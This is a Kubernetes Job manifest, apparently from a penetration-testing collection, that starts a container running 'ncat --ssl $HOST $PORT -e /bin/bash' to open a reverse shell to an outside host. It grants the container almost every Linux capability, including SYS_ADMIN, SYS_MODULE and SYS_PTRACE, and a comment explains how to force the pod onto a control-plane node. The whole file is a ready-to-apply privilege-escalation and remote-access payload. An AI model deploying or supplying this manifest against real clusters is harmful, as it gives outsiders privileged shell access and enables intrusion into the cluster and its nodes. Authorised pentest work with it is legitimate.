apiVersion: batch/v1
kind: Job
metadata:
  name: caps-revshell-job
  labels:
    app: pentest
    type: job
spec:
  template:
    spec:
      containers:
      - name: caps-revshell-job
        image: raesene/ncat
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
        securityContext:
          capabilities:
            add: ["CHOWN","DAC_OVERRIDE","DAC_READ_SEARCH","FOWNER","FSETID","KILL","SETGID","SETUID","SETPCAP","LINUX_IMMUTABLE","NET_BIND_SERVICE","NET_BROADCAST","NET_ADMIN","NET_RAW","IPC_LOCK","IPC_OWNER","SYS_MODULE","SYS_RAWIO","SYS_CHROOT","SYS_PTRACE","SYS_PACCT","SYS_ADMIN","SYS_BOOT","SYS_NICE","SYS_RESOURCE","SYS_TIME","SYS_TTY_CONFIG","MKNOD","LEASE","AUDIT_WRITE","AUDIT_CONTROL","SETFCAP","MAC_OVERRIDE","MAC_ADMIN","SYSLOG","WAKE_ALARM","BLOCK_SUSPEND","AUDIT_READ","PERFMON","BPF","CHECKPOINT_RESTORE"]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      restartPolicy: OnFailure
